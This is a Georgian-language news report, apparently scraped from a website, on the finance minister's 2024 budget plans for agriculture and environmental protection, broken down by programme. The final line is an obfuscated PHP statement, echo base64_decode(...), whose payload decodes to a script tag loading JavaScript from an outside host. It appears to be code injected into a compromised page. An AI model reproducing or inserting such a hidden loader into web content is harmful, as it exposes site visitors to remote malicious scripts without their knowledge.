celsiusi
ავერსი შნაიდერი

2024 წელს სოფლის მეურნეობის მიმართულებაზე დაიხარჯება 579 მლნ ლარი

ფინანსთა მინისტრ ლაშა ხუციშვილის განცხადებით, 2024 წელს სოფლის მეურნეობის მიმართულებაზე დაიხარჯება 579 მლნ ლარი, მათ შორის:

  • შეღავათიანი აგროკრედიტის პროგრამის დასაფინანსებლად მიიმართება 200 მლნ ლარი, ტექნიკის თანადაფინანსებისათვის 20 მლნ ლარი, ხოლო გადამამუშავებელი და შემნახველი საწარმოების თანადაფინანსებისათვის 17 მლნ ლარი;
  • მევენახეობა-მეღვინეობის პროგრამისთვის 54 მლნ ლარი;
  • დანერგე-მომავლის დასაფინანსებლად 26 მლნ ლარი, ხოლო აგროდაზღვევისათვის 12 მლნ ლარი;
  • თხილის წარმოების და მერძევეობის ხელშეწყობისათვის 20-20 მლნ ლარი;
  • სურსათის უვნებლობისა და მცენარეთა დაცვისათვის 64 მლნ ლარი;
  • სამელიორაციო სისტემების მოდერნიზაციისთვის 79 მლნ ლარამდე.

ფინანსთა მინისტრის განცხადებით, 2024 წელს გარემოს დაცვის მიმართულებაზე დაიხარჯება 650 მლნ ლარზე მეტი,  მათ შორის, მუნიციპალური გარემოსდაცვითი პროგრამებისათვის 450 მლნ ლარი. აღნიშნული დაფინანსების ფარგლებში, მათ შორის, გათვალისწინებულია:

  • გარემოს ეროვნული სააგენტოს ბიუჯეტის დაფინანსების გასამმაგება;
  • ადრეული გაფრთხილებისა და პრევენციის შესაძლებლობების გაძლიერების მიზნით, დაგეგმილია დამატებითი მეტეოროლოგიური სადგურების შეძენა-მონტაჟი; მყინვარულ ხეობებში შესაძლო ჰიდრომეტეოროლოგიური და გეოლოგიური საფრთხეების დეტალური შეფასება და ქვეყნის მასშტაბით მსხვილი მეწყრული უბნების გეოლოგიური კვლევა და თანამედროვე მონიტორინგის სისტემის ინსტალირება (24 მლნ ლარი);
  • გარემოსდაცვითი ზედამხედველობის ღონისძიებების დაფინანსება - 29 მლნ ლარით;
  • სატყეო სისტემების მართვისთვის - 35 მლნ ლარი;
  • დაცული ტერიტორიების მართვისთვის - 23 მლნ ლარზე მეტი. გადამუშავებულ ვარიანტთან შედარებით, პროგრამისთვის დამატებით გამოიყო 3,0 მლნ ლარი. აღნიშნული თანხა წარმოადგენს ბიომრავალფეროვნების პროგრამის ხელშეწყობისთვის გერმანიის მიერ გამოყოფილ გრანტს და მის თანადაფინანსებას;
  • მყარი ნარჩენების მართვისთვის - 88 მლნ ლარი.

199
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");